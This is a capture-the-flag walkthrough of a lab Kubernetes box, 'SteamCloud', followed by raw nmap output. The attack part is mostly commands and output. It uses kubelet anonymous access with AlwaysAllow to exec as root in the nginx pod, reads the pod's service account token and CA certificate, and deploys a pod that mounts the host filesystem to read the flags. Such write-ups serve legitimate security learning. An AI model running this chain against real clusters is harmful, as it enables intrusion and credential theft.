SteamCloud

Detailed Walkthrough

Initial Access

Upon establishing a connection to the VPN, the tester initiated the assessment by performing a service enumeration. This process revealed the following open ports:

• 22/tcp open OpenSSH 7.9p1

• 2379/tcp open etcd

• 8443/tcp open API server

• 10250/tcp open kubelet

• 10256/tcp open kube-proxy

The presence of these ports indicated that a kubernets cluster was running on the target server.

Kubelet API

The kubelet runs on every cluster node, typically on 10250/tcp. It manages pods on the node and communicates with the Kubernetes API server. Also it was identified that the kubelet API was reachable, which can permit unauthenticated execution of commands if improperly secured.

Using kubeletctl to inspect the node configuration, it was discovered a dangerous permissions settings.

• Authentication methods present included webhook (bearer token-based), anonymous access, and x.509 client certificates.

• The authorization mode was configured as AlwaysAllow, which effectively permits all requests without enforcing RBAC checks.

❯ kubeletctl -s 10.10.11.133 configz
    "authentication": {
      "x509": {
        "clientCAFile": "/var/lib/minikube/certs/ca.crt"
      },
      "webhook": {
        "enabled": true,
        "cacheTTL": "2m0s"
      },
      "anonymous": {
        "enabled": true
      }
    },
    "authorization": {
      "mode": "AlwaysAllow",
      "webhook": {
        "cacheAuthorizedTTL": "5m0s",
        "cacheUnauthorizedTTL": "30s"
      }
    },
<SNIF>

Given the kubelet configuration, the tester ran an automated scan and found pods with accessible exec endpoints. kubeletctl reported that the nginx pod in the default namespace exposed an exec interface.

❯ kubeletctl -s 10.10.11.133 scan rce
┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
│                                   Node with pods vulnerable to RCE                                  │
├───┬──────────────┬────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤
│   │ NODE IP      │ PODS                               │ NAMESPACE   │ CONTAINERS              │ RCE │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│   │              │                                    │             │                         │ RUN │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 1 │ 10.10.11.133 │ storage-provisioner                │ kube-system │ storage-provisioner     │ -   │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 2 │              │ kube-proxy-5ft76                   │ kube-system │ kube-proxy              │ +   │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 3 │              │ coredns-78fcd69978-xthxm           │ kube-system │ coredns                 │ -   │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 4 │              │ nginx                              │ default     │ nginx                   │ +   │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 5 │              │ etcd-steamcloud                    │ kube-system │ etcd                    │ -   │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 6 │              │ kube-apiserver-steamcloud          │ kube-system │ kube-apiserver          │ -   │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 7 │              │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │ -   │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 8 │              │ kube-scheduler-steamcloud          │ kube-system │ kube-scheduler          │ -   │
└───┴──────────────┴────────────────────────────────────┴─────────────┴─────────────────────────┴─────┘

❯ kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)

If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the env var KUBECONFIG or inside ~/.kube. on other hand If you have compromised a pod inside a kubernetes environment you can find for Service Account Tokens usually stored on

• /run/secrets/kubernetes.io/serviceaccount

• /var/run/secrets/kubernetes.io/serviceaccount

• /secrets/kubernetes.io/serviceaccount

The tester look for ServiceAccount credentials in pod and found the default ServiceAccount token and CA certificate at the usual path:

❯ kubeletctl -s 10.10.11.133 exec "ls /var/run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx
ca.crt	namespace  token
❯ kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
eyJh<SNIF>VFtVEkkL0OyskuIL-v5Q0Iox0Q                                                                                                               
❯ kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
<SNIF>
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----
❯ kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/namespace" -p nginx -c nginx
default

• ca.crt: It's the ca certificate to check Kubernetes communications

• namespace: It indicates the current namespace

• token: It contains the service token of the current pod.

Privilege escalation

Once obtained the certificate and token, It was discovered that the current session had get, create, and list permissions, which opened an opportunity to escape the node and compromise the cluster.

TOKEN='eyJhbG<SNIF>QVFtVEkkL0OyskuIL-v5Q0Iox0Q'
❯ kubectl --token=$TOKEN --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
Resources                                       Non-Resource URLs                     Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
pods                                            []                                    []               [get create list]
<SNIF>

Additionally, The running pods was enumerated on the node to verify the list permissions.

❯ TOKEN='eyJhbGciOiJS<SNIF>e2jW3oHDxWjqxkwwkw979R0bsugEihQaQ'
❯ kubectl --token=$TOKEN --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          4h17m

In order to escape the node, the tester obtained the pod’s image version and then deployed a specially crafted pod designed to mount the host system at /root, enabling access to the underlying node.

❯ kubectl --token=$TOKEN --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          40m
❯ kubectl --token=$TOKEN --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pod nginx -o yaml
<SNIF>
  - image: nginx:1.14.2
    imagePullPolicy: Never
    name: nginx
<SNIF>

Finally, The pod was deployed using a YAML that granted access to the host filesystem, resulting in full compromise of the server..

❯ kubectl --token=$TOKEN --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f attack.yaml
❯ kubectl --token=$TOKEN --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pod
NAME            READY   STATUS             RESTARTS   AGE
attacker-pod   1/1     Running            0          13s
nginx           1/1     Running            0          55m

❯ kubeletctl -s 10.10.11.133 exec "cat /root/home/user/user.txt" -p attacker-pod -c attacker-pod2
<SNIF>
❯ kubeletctl -s 10.10.11.133 exec "cat /root/root/root.txt" -p attacker-pod -c attacker-pod2
<SNIF>

Credentials

Username	Password	Methods	Scope	Notes

👤 Users wordlist

🔑 Password wordlist

Subdomains / Hosts

Subdomain / Host	Host	Description	Notes

Host Discovered

Nombre	IP	Domain	Low Access	High Access	OS
SteamCloud	10.10.11.133	SteamCloud.htb			Linux

Scans

# Nmap 7.95 scan initiated Wed Oct 22 19:31:24 2025 as: /usr/lib/nmap/nmap --privileged --open -sS -Pn -n -p- -T5 -A -oN 10.10.11.133_tcp_allports -vvv 10.10.11.133
Nmap scan report for 10.10.11.133
Host is up, received user-set (0.076s latency).
Scanned at 2025-10-22 19:31:25 PDT for 66s
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE          REASON         VERSION
22/tcp    open  ssh              syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCu4TNCZjLe74tZ0HyspkMaghndsvuXkZJa4lJBt9arqgkm6u2HI/RRdwbjE14au2u/YF89y23Q55iOGraA+9JjpyTzDPo3kxE/RisYzJaUDmzza+hqEeyTxXkZby9+DAhKm5UXs7M2CMDr3cwOPPQ96u/zUX0gDG3CfYw4fAi2TDGa6jU5KmGzIQz6SQR3Bv6IYLDwzNJ0nHNZ3jxSbFS3SsmTwK749GJLrv62wAf4uUL/Ihynl8cCG5aor6T0Fk44v/9ndfujznBvWaMYVPpf9B49XlD7OhXB5pCK2nPZrdze+ch6yhAM/vYrYA4sNk3IuFG3OCrDkVeUJn5sJKx5
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHVj7iKnl8SWdGz6J4F3kvpZjM1Tim0iHlUnQByS8xJYnfwttLxVwGb+aaGbRhOJu4mq9y4crwFh50rC9mAEHWo=
|   256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXIZpU9XbtZ2zvx8rFEYTfGp+8JCJx5lSiRNEcqUFG8
2379/tcp  open  ssl/etcd-client? syn-ack ttl 63
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Issuer: commonName=etcd-ca
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-23T00:48:36
| Not valid after:  2026-10-23T00:48:37
| MD5:   b1e1:b1dc:c7fd:b2ca:fd7a:3109:a0dc:7591
| SHA-1: ef20:13ea:6812:931a:30e5:1eb0:a265:99fd:06ea:03fe
| -----BEGIN CERTIFICATE-----
| MIIDSzCCAjOgAwIBAgIISGXPVf3Ry3cwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UE
| AxMHZXRjZC1jYTAeFw0yNTEwMjMwMDQ4MzZaFw0yNjEwMjMwMDQ4MzdaMBUxEzAR
| BgNVBAMTCnN0ZWFtY2xvdWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
| AQDUKjEKFAvxLhn4mL/1fVmPud9No/zGSNL38Ad+9pD8eaYOc/5Mk0V9ufOP05W+
| CMKWiTtoFW0CI+Hc3dtpdFQ0AZg3Ryyl57yFvkWbMtcqfFjgoU76wrLLFPdsm9px
| AxYS8WDuOsV0C66XNY7vJR50ek2dQTB2f8NyQBKKjHUs2uF9/IB9KaRbG3fcB9L0
| FzsGvpYZPQyfqcyqWAL3d5B57x2/44FKQpPjLrCBx8uIN/bUBsui18KGkJQwGnuL
| PfFfHz4AW2k0vgNqplMTNu3wOqQBijR5m6VW1+1DMwJ8OG0024Ym+X3caQQ1ObsA
| AL/22CYy/4/cs4wH0HtQb0UvAgMBAAGjgaEwgZ4wDgYDVR0PAQH/BAQDAgWgMB0G
| A1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB8GA1Ud
| IwQYMBaAFOCmK47q60/fsjy8t2FaQUKRl6pPMD4GA1UdEQQ3MDWCCWxvY2FsaG9z
| dIIKc3RlYW1jbG91ZIcECgoLhYcEfwAAAYcQAAAAAAAAAAAAAAAAAAAAATANBgkq
| hkiG9w0BAQsFAAOCAQEAr9wbrlvkSMtUQeiHlWYbOLj/geOCHIEBnXGbeNMTJMph
| iuxVfWdnRFdPl+dZ5SXsX46OFIcknXfXAnEfMCsT4D7rtsDce3HkSafNtZ7wlxyl
| r5TccGVVoYN6T2t8+h2cemGtZ9XixzjBbdoKg9nzqO9Q0fxO8j0DTYAUwT7S4H1L
| NuvOga3QsejsnW7a4xkbTxFA+o9RbcBtZAHYD/TQ4dmpwh6eAxTAw9FQNPg1YvWQ
| YeK7CSGZBvCfkvN0Ir9zad59Jh4Bq0oafcyEqpWcaYeataH90705c73vmwoBKO+/
| yONRovhIXToMHSPY2aM8gn3FyTBP1aJL/rqXSUBX9A==
|_-----END CERTIFICATE-----
| tls-alpn: 
|_  h2
|_ssl-date: TLS randomness does not represent time
2380/tcp  open  ssl/etcd-server? syn-ack ttl 63
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  h2
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Issuer: commonName=etcd-ca
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-23T00:48:36
| Not valid after:  2026-10-23T00:48:37
| MD5:   2694:d281:b3a0:09e6:ab33:1244:3bfb:90af
| SHA-1: b779:771e:0d43:ac2e:c82b:10a3:5f32:ac77:de79:76a1
| -----BEGIN CERTIFICATE-----
| MIIDSzCCAjOgAwIBAgIICVC3K+n2JFMwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UE
| AxMHZXRjZC1jYTAeFw0yNTEwMjMwMDQ4MzZaFw0yNjEwMjMwMDQ4MzdaMBUxEzAR
| BgNVBAMTCnN0ZWFtY2xvdWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
| AQDJ7Sp5z7gA/+FwfeirPexviUVmJY8eAFVeZh947tAuGSpgiAfsS5/nYYhm6gx/
| +z/RkR4+yGOKYXer1pqjCUNjusNjJVevFEWSKs1QmW0r4UVilZoJfQ/At2mCi7+C
| dECSSC4Rl/PRVlnbnhHf3Uf3sn4T3vpr6PqCs30oC4Nn/fCUwrC5UZyYhlVES3ya
| 7Yads/EutpayacftHrOjdDqrhJZA0zagiHh4lBpJDFtZ7M33WXXDUvN6g1AoRQO2
| jajfN789ibemdo2DdCETVVr5GaH3dpikLiXxnqiZ+UeL0qa/e8HDlSh2MrRpRwIo
| 745tL6XGduF0/46pXto4ldE5AgMBAAGjgaEwgZ4wDgYDVR0PAQH/BAQDAgWgMB0G
| A1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB8GA1Ud
| IwQYMBaAFOCmK47q60/fsjy8t2FaQUKRl6pPMD4GA1UdEQQ3MDWCCWxvY2FsaG9z
| dIIKc3RlYW1jbG91ZIcECgoLhYcEfwAAAYcQAAAAAAAAAAAAAAAAAAAAATANBgkq
| hkiG9w0BAQsFAAOCAQEAk7f+mpunM1akoEYRz7MlMayQCyhIbbFZWfSpqqCpGMdZ
| 4kqdqqbrckvfplGvdjGip6qyrOdQu5Fwtj6d79iCp16Qqfq2Z357XVaxW5GHvbn7
| 8FYB+kp7AEUS4P6R1Se9ZGixZjnN67kQUz60MzErjSZqGLwjp7gCXEq0uFlYEKaA
| VrGaPk5bOwpqbB0RzIM04GCnc9HmDb9ySGvt87W8YsUOTHsemOCNR+eiOUAAmvTj
| QJ/Ck/xT8W9Ap0gM+0UlPxgwpPVSLTGsi7bx9+tytZ9X06AmPCe8YgVHXtR4w+Ib
| v+gpPfLmATvYSE6oFuAMi2A2yn98WoTbkj1hW55xDA==
|_-----END CERTIFICATE-----
8443/tcp  open  ssl/http         syn-ack ttl 63 Golang net/http server
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 2227bca0-7a61-495f-a954-0ce48d51afdc
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 79288f7d-0501-4831-87ac-83f5a778d86a
|     X-Kubernetes-Pf-Prioritylevel-Uid: 527b5eeb-7e04-4030-afc6-ada850d87d3c
|     Date: Thu, 23 Oct 2025 02:32:02 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: ad56d9db-ea6f-43ea-90c4-5a12f9979f53
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 79288f7d-0501-4831-87ac-83f5a778d86a
|     X-Kubernetes-Pf-Prioritylevel-Uid: 527b5eeb-7e04-4030-afc6-ada850d87d3c
|     Date: Thu, 23 Oct 2025 02:32:02 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: eebb81ed-8a99-48e6-92bf-eb0c720b04cd
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 79288f7d-0501-4831-87ac-83f5a778d86a
|     X-Kubernetes-Pf-Prioritylevel-Uid: 527b5eeb-7e04-4030-afc6-ada850d87d3c
|     Date: Thu, 23 Oct 2025 02:32:02 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Issuer: commonName=minikubeCA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-22T00:48:35
| Not valid after:  2028-10-22T00:48:35
| MD5:   ccdc:b682:8dd1:aea9:9a58:cb4e:2c9a:d7d5
| SHA-1: b0e9:87af:44a1:911d:91d9:a522:7dd7:ed46:9af1:fc0b
| -----BEGIN CERTIFICATE-----
| MIID3DCCAsSgAwIBAgIBAjANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
| a3ViZUNBMB4XDTI1MTAyMjAwNDgzNVoXDTI4MTAyMjAwNDgzNVowLDEXMBUGA1UE
| ChMOc3lzdGVtOm1hc3RlcnMxETAPBgNVBAMTCG1pbmlrdWJlMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxGVvMgDtgp6h2B3BUmU29YfMsFCFylqGq9uM
| D/yUPwrXWNMjLVCXK8V1p7LRJ5xYv3zk0WVgTLwVdYUphbF+ilovhWFuf4fQ4NmB
| PoGzy7mSb0dtfP8yvPNTo1pskofp6//+XyfOGzfW8QrmGSW26Le0X8qQxqJ1+OnM
| bSmTkdR+FlCACj+UVZOfVVYPEcWyd0grEBJ75a/u8dIWuurG2gJe6cT3LQIuX2Zh
| oYaN9u/G5wSS7Et2PqrHdhCfIyGd3SG0D8BKR8zmZvrYUXRh+O1CT9M3g6zSZrkL
| +ghAZ6Wc7KtMZs0stWbWGrLvEKtwP+ULS56XknmJyvSkXXlBnQIDAQABo4IBHjCC
| ARowDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
| AjAMBgNVHRMBAf8EAjAAMB8GA1UdIwQYMBaAFKlEoIQptW1GxgQZHDJpV6icF0wK
| MIG5BgNVHREEgbEwga6CCm1pbmlrdWJlQ0GCH2NvbnRyb2wtcGxhbmUubWluaWt1
| YmUuaW50ZXJuYWyCJGt1YmVybmV0ZXMuZGVmYXVsdC5zdmMuY2x1c3Rlci5sb2Nh
| bIIWa3ViZXJuZXRlcy5kZWZhdWx0LnN2Y4ISa3ViZXJuZXRlcy5kZWZhdWx0ggpr
| dWJlcm5ldGVzgglsb2NhbGhvc3SHBAoKC4WHBApgAAGHBH8AAAGHBAoAAAEwDQYJ
| KoZIhvcNAQELBQADggEBAIM+mIaI9d1BkekgRlh3f3qoRnvrUCHshVikCkQN8c/d
| Gq5uFSu94mZ28K4mJyuDN7iRLmVldSSU5cvse2jXYqibV8yX/7DHUNl2220RHkmc
| heuZC8zYnkaM8/TX4RgYBJQTuhLA+GdS6dak4Sstzpz1jYKmtFZ232F0XCI5bEwq
| jnOJiD71gDeqHtJqvI8ncRFuobRpUMjzMC3qNzMqfC0nEb0+pFFl2kyiiWuRklll
| ZlhlorRoBc+ZlvER4dqAeutsrOlvyobq0b8lEuN1/5kv9aMCGGVZrUMKLtkfPZG5
| 43RTNhkfAdJHkVIPlo+SeD/ux32V2lhagfcur6CLsqg=
|_-----END CERTIFICATE-----
|_http-title: Site doesn't have a title (application/json).
10249/tcp open  http             syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10250/tcp open  ssl/http         syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| ssl-cert: Subject: commonName=steamcloud@1761180519
| Subject Alternative Name: DNS:steamcloud
| Issuer: commonName=steamcloud-ca@1761180518
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-22T23:48:38
| Not valid after:  2026-10-22T23:48:38
| MD5:   5ed4:4112:c4ab:fe1a:52bb:6f9c:ae76:4bf2
| SHA-1: 4fdb:32ce:1b50:1fe5:b87d:f65e:ae11:358e:a9f4:dccd
| -----BEGIN CERTIFICATE-----
| MIIDKzCCAhOgAwIBAgIBAjANBgkqhkiG9w0BAQsFADAjMSEwHwYDVQQDDBhzdGVh
| bWNsb3VkLWNhQDE3NjExODA1MTgwHhcNMjUxMDIyMjM0ODM4WhcNMjYxMDIyMjM0
| ODM4WjAgMR4wHAYDVQQDDBVzdGVhbWNsb3VkQDE3NjExODA1MTkwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPe3KpuJf3gpevOZG7Ku/nwAg8ZCZHAQ91
| coO5WKDITI5fa86ZIQr/zs+GtaLu0lINE9IgJF2CcolcKwajb2ryQ3zgh8APm/gg
| SzYGsK7LhSaKxLPI6CiOgKdBk7tnQIBL0V5GM8RAipx4aluEkoH9XtS16pQG8VvE
| J57Kt5Kf81x3y/XjoNMLyI9dCtimwENgdF190z/Cv1sAxSxCYrqTIZi6i0T6ejpZ
| GniK6/apoYkP/GJdVWDjaVbAWcntGoFHQAHLkSrPoWH1G6FqjeQmpd7sUNvYK0Ye
| PtvBFSRSjjNR1Qn2Vfx4UxvRGJNY3MKUvI7e+s8YBaUApmZa5MwxAgMBAAGjbTBr
| MA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
| AjAAMB8GA1UdIwQYMBaAFHrmTgcW/1tLCuePXEwd7OIj9H7mMBUGA1UdEQQOMAyC
| CnN0ZWFtY2xvdWQwDQYJKoZIhvcNAQELBQADggEBAKQVztO1zFvX8wvkiVU39aNg
| PVAFXXjROX7tv7IW8sl2W4loOYNSRT/gGZCjgCq2FE3JUaG/ITuPECUZmP42xbmX
| pNAi0fP6y39eYP2+8Z4FBX81hhy+h77Zqu9/zxBXvCknqR1829tPPbZKVcvFE/Cw
| ESQJ3he+6ExW6/pD5GBa2XcP/as+JzugfRUVzoOP8NHegecWB0mf0akwjyEHUg74
| 4eeJBj3sA3JKFzeeAV5ijFinD47+ZjLdLYv8VZ9Z6CeNpsqDULkNI9FaZos6GNKJ
| KOcigOgAZoB1tSIelQih1mqWeP2X/QxIoAo2PtTerlhCnPuBtvMT3TL/Yf5NC/o=
|_-----END CERTIFICATE-----
10256/tcp open  http             syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=10/22%Time=68F993A2%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20ad56
SF:d9db-ea6f-43ea-90c4-5a12f9979f53\r\nCache-Control:\x20no-cache,\x20priv
SF:ate\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20
SF:nosniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2079288f7d-0501-4831-87ac-8
SF:3f5a778d86a\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20527b5eeb-7e04-4030
SF:-afc6-ada850d87d3c\r\nDate:\x20Thu,\x2023\x20Oct\x202025\x2002:32:02\x2
SF:0GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersion
SF:\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidde
SF:n:\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"
SF:/\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(HTT
SF:POptions,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20eebb81ed-8a
SF:99-48e6-92bf-eb0c720b04cd\r\nCache-Control:\x20no-cache,\x20private\r\n
SF:Content-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosniff
SF:\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2079288f7d-0501-4831-87ac-83f5a778
SF:d86a\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20527b5eeb-7e04-4030-afc6-a
SF:da850d87d3c\r\nDate:\x20Thu,\x2023\x20Oct\x202025\x2002:32:02\x20GMT\r\
SF:nContent-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1
SF:\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x20U
SF:ser\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/\\
SF:\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(FourOh
SF:FourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x202227bca0
SF:-7a61-495f-a954-0ce48d51afdc\r\nCache-Control:\x20no-cache,\x20private\
SF:r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosn
SF:iff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2079288f7d-0501-4831-87ac-83f5a
SF:778d86a\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20527b5eeb-7e04-4030-afc
SF:6-ada850d87d3c\r\nDate:\x20Thu,\x2023\x20Oct\x202025\x2002:32:02\x20GMT
SF:\r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\
SF:"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x
SF:20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/nic
SF:e\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"details\
SF:":{},\"code\":403}\n");
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=10/22%OT=22%CT=1%CU=39378%PV=Y%DS=2%DC=T%G=N%TM=68F993
OS:BF%P=x86_64-pc-linux-gnu)SEQ(SP=F7%GCD=1%ISR=111%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M552ST11NW7%O2=M552ST11NW7%O3=M552NNT11NW7%O4=M552ST11NW7%O5=M552ST1
OS:1NW7%O6=M552ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M552NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 43.403 days (since Tue Sep  9 09:51:45 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=247 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   75.24 ms 10.10.14.1
2   75.21 ms 10.10.11.133

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 22 19:32:31 2025 -- 1 IP address (1 host up) scanned in 66.88 seconds

Scripts / Automations / Resources

attack.yaml

